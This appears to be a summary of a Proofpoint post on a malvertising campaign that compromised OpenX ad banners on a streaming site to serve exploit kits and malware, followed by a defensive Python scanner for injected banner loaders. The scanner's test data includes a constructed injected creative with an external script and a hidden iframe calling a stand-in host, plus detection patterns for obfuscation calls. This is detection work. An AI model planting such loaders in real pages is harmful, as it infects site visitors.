In a new blog post, Proofpoint discusses its discovery of a new malvertising campaign targeting a popular media streaming site.
Key takeaways from the post include:
Proofpoint researchers have detected that a prominent live video streaming platform was the victim of a malvertising campaign and has been actively serving malware to visitors. This is a result of an ongoing mass injection campaign against OpenX, an open-source ad server, and provides an instructive example of the operation of an injected JavaScript.
As we described in our recent post on a major malvertising campaign, exploits served by infected sites will silently infect visitors with malware, without the victim noticing or having to “click on” or “agree to” anything: simply visiting the website can result in an infection for vulnerable systems. The site was detected delivering Zemot malware, but other malware known to be delivered by the active exploit kits include Cidox, a vicious master boot record (MBR) rootkit, and the Zeus banking Trojan (aka Zbot).
It appears that the site is running OpenX 2.8.9, which is not the latest version. It is very important to note that even the latest version, OpenX 2.8.11, is known to be vulnerable to SQL injection exploits since December 2013 (CVE-2013-7149). The vulnerability is considered an “old 0-day” because OpenX never released a patch to fix this vulnerability in this or any other version of OpenX.
This case highlights the current malvertising threat created by the large number of unsupported OpenX installations in the wild, which we analyzed in a recent post. In the case of this site, the attackers have been able to modify the HTML code for the banner ad that is displayed on every page, and have infected it with the following script:
The injected script forces visiting browsers to "pull in" malicious script from some malicious domain. A visitor is ultimately fed with exploits from either the Nuclear or the Sweet Orange exploit kit. We’ve observed the involved Sweet Orange EK installations to support the following exploits: CVE-2013-2551 (IE), CVE-2013-2424 (IE), CVE-2013-2471 (Java), CVE-2014-0322 (IE), and CVE-2013-2460 (Java).
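The pattern the post describes, a banner creative whose HTML has been modified to load script from a domain the ad server never intended, is something an ad-server operator can check for statically. The following scanner is an added example written for this summary; it is neither Proofpoint's tooling nor part of OpenX. It walks a creative's HTML, flags any `<script>` or `<iframe>` whose host is outside an allowlist of the publisher's own ad and CDN hosts, and flags inline-script constructs commonly used to hide such loaders (`document.write`, `eval`, `unescape`, `String.fromCharCode`, an inline `<iframe>`) or an iframe sized or styled to be invisible. The allowlisted hosts, the `.invalid` loader domain and the banner markup below are all constructed for illustration.

```python
"""Static scanner for injected loaders in ad banner HTML.

Constructed example for this note; not Proofpoint code and not part of
OpenX. Hosts and sample creatives below are made up for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts an honest creative on this ad server may legitimately load from
# (constructed example values; a real deployment uses its own list).
ALLOWED_HOSTS = {"ads.example.com", "cdn.example.com"}

# Inline-script constructs that rarely belong in a static display banner.
SUSPICIOUS_INLINE = [
    (re.compile(r"document\.write\s*\(", re.I), "document.write"),
    (re.compile(r"\beval\s*\(", re.I), "eval"),
    (re.compile(r"\bunescape\s*\(", re.I), "unescape"),
    (re.compile(r"String\.fromCharCode", re.I), "fromCharCode"),
    (re.compile(r"<iframe", re.I), "inline iframe"),
]


class BannerScanner(HTMLParser):
    """Collects (finding_type, detail) tuples while parsing one creative."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []
        self._in_script = False
        self._script_text = []

    @staticmethod
    def _host_of(url):
        # urlparse handles absolute and protocol-relative ("//host/x") URLs;
        # a relative path yields no host and is treated as same-origin.
        return (urlparse(url).hostname or "").lower()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            # HTMLParser delivers the script body via handle_data until </script>.
            self._in_script = True
            self._script_text = []
            host = self._host_of(a.get("src") or "")
            if host and host not in self.allowed_hosts:
                self.findings.append(("external-script", host))
        elif tag == "iframe":
            host = self._host_of(a.get("src") or "")
            if host and host not in self.allowed_hosts:
                self.findings.append(("external-iframe", host))
            style = (a.get("style") or "").replace(" ", "").lower()
            if (a.get("width") == "0" or a.get("height") == "0"
                    or "display:none" in style or "visibility:hidden" in style):
                self.findings.append(("hidden-iframe", host))

    def handle_data(self, data):
        if self._in_script:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._script_text)
            for pattern, label in SUSPICIOUS_INLINE:
                if pattern.search(body):
                    self.findings.append(("suspicious-inline", label))
            self._in_script = False


def scan_banner_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return the list of findings for one creative; an empty list means clean."""
    scanner = BannerScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample creatives: a plain image banner, and the same banner
# with an injected external loader plus an inline hidden-iframe writer.
CLEAN_BANNER = (
    '<a href="https://ads.example.com/click?id=1">'
    '<img src="https://cdn.example.com/banner.png" width="728" height="90"></a>'
)
INJECTED_BANNER = CLEAN_BANNER + (
    '<script src="//malicious-loader.invalid/ad.js"></script>'
    '<script>document.write(\'<iframe src="http://malicious-loader.invalid/x"'
    ' width=0 height=0></iframe>\');</script>'
)

if __name__ == "__main__":
    for name, creative in (("clean", CLEAN_BANNER), ("injected", INJECTED_BANNER)):
        print(name, scan_banner_html(creative))
```

Run over every creative stored by the ad server (for OpenX, the banner HTML in its database), a non-empty result is a review trigger rather than proof of compromise: legitimate rich-media tags do use `document.write`, which is why the allowlist, not the inline heuristics, should carry most of the weight.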